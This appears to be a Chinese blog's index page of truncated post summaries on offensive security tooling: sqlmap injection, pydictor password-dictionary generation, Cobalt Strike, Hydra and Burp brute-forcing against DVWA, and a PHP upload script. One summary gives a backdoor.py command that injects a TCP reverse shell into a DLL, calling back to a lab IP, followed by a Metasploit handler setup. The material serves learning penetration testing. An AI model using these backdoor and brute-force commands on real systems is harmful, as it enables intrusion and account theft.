摘要:
SQLMAP工具的使用 sql注入工具:明小子 啊D 萝卜头 穿山甲 sqlmap等等 开源自动化注入利用工具,支持12中数据库,在/plugins中可以看到支持的数据库种类 支持的注入类型:bool,时间,报错,联合,堆查询,内联 可以获取用户名 密码 权限 角色 数据库 (表,字段,内容) 可以 阅读全文
摘要:
社攻密码字典的生成(工具) Pydictor:强大的密码生成工具,合并密码字典,词频统计,去重,枚举数字字典. Python pydictor.py -base d --len 4 4 生成纯数字四位密码 Python pydictor.py -base L --len 4 4 -o name.tx 阅读全文
摘要:
./backdoor.py -f libEGL.dll -s reverse_shell_tcp_inline -P 6666 -H 192.168.106.137 msfconsle 打开msf 在msf 中 use exploit/multi/handler set payload window 阅读全文
摘要:
<?php header("Content-type:text/html;charset:utf-8"); if ($_FILES["file"]["error"]>0) { echo $_FILES["file"]["error"]."<br>"; } else { echo "文件名:".$_F 阅读全文
摘要:
远程控制: 控制端:运行在运行 Cobalt Strike 介绍:后渗透测试工具,基于java开发,适用于团队间协同作战,简称“CS” CS分为客户端和服务端,一般情况下我们称服务端为团队服务器,具有社会工程学攻击的方法和手段,团队服务器可以帮助我们手机信息以及管理日记记录。linux中需要以roo 阅读全文
摘要:
PHP 基础语法规范: 1 <?php 开头 ?>结尾 2 php可以单独存在也可以和html等结合使用 3后缀名一般以.php结尾 php4,php5,php6,php7,phtml. 4 php的配置文件一般为php.ini 开发PHP的环境准备 1.phpstudy 8 版本,php的版本可以 阅读全文
摘要:
使用BP和Hydra爆破相关的服务。 Hydra:九头蛇,开源的功能强大的爆破工具,支持的服务有很多,使用hydra爆破c/s架构的服务。使用bp爆破web登录端口。 dvwa:web应用程序漏洞演练平台,开源,集成的常见web漏洞,使用PHP+MYSQL环境的支持。 爆破=爆破工具(bp/hydr 阅读全文